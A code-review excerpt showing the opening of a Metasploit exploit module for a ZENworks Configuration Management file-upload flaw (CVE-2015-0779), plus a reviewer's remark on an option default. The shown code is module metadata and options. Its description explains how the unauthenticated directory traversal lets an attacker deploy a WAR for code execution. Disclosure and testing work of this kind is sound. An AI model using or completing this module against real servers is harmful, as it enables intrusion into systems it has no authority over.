modules/exploits/multi/http/zcm_file_upload.rb

```diff
@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Novell ZENworks Configuration Management Arbitrary File Upload',
+      'Description' => %q{
+        This module exploits a file upload vulnerability in Novell ZENworks
+        Configuration Management (ZCM, which is part of the ZENworks Suite).
+        The vulnerability exists in UploadServlet which accepts unauthenticated
+        file uploads and does not check the "uid" parameter for directory traversal
+        characters. This allows an attacker to write anywhere in the file system,
+        and can be abused to deploy a WAR file in the Tomcat webapps directory.
+        ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module
+        has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note
+        that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also
+        has a Metasploit exploit, but it abuses a different parameter of the same
+        servlet.
+      },
+      'Author'       =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2015-0779' ],
+          [ 'OSVDB', '120382' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Apr/21' ]
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 30 },
+      'Privileged'  => true,
+      'Platform'    => 'java',
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'Novell ZCM < v11.3.2 - Universal Java', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 7 2015'))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL',
+          [ true, "Use SSL", true ]),
+        OptString.new('TARGETURI',
+          [ true, "The base path to ZCM / ZENworks Suite", '/zenworks/' ]),
+        OptString.new('TOMCAT_PATH',
```

Comment:
If the ```TOMCAT_PATH``` isn't required, you can avoid initialization by deleting the last ```''``` default value